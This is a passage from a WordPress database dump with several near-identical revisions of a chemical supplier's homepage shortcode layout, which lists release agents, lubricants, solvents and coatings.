support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 21:56:45', '2016-08-15 21:56:45', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (99, 1, '2016-08-15 21:57:56', '2016-08-15 21:57:56', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 21:57:56', '2016-08-15 21:57:56', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (100, 1, '2016-08-15 21:59:49', '2016-08-15 21:59:49', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text-align=bottom text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 21:59:49', '2016-08-15 21:59:49', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (101, 1, '2016-08-15 22:05:32', '2016-08-15 22:05:32', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary"  text-align="right" text-pos="right" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:05:32', '2016-08-15 22:05:32', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (102, 1, '2016-08-15 22:11:57', '2016-08-15 22:11:57', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text-align="right" text-pos="right" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:11:57', '2016-08-15 22:11:57', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (103, 1, '2016-08-15 22:12:27', '2016-08-15 22:12:27', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner text_width="60%" text_align="right" text_pos="right bottom"]\r\n\r\n[button size="medium" style="primary" text-align="right" text-pos="right" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:12:27', '2016-08-15 22:12:27', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (104, 1, '2016-08-15 22:13:31', '2016-08-15 22:13:31', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner text_width="60%" text_align="right" text_pos="bottom"]\r\n\r\n[button size="medium" style="primary" text-align="right" text-pos="right" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:13:31', '2016-08-15 22:13:31', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (105, 1, '2016-08-15 22:14:30', '2016-08-15 22:14:30', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner text_width="60%" text_align="right" text_pos="bottom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" 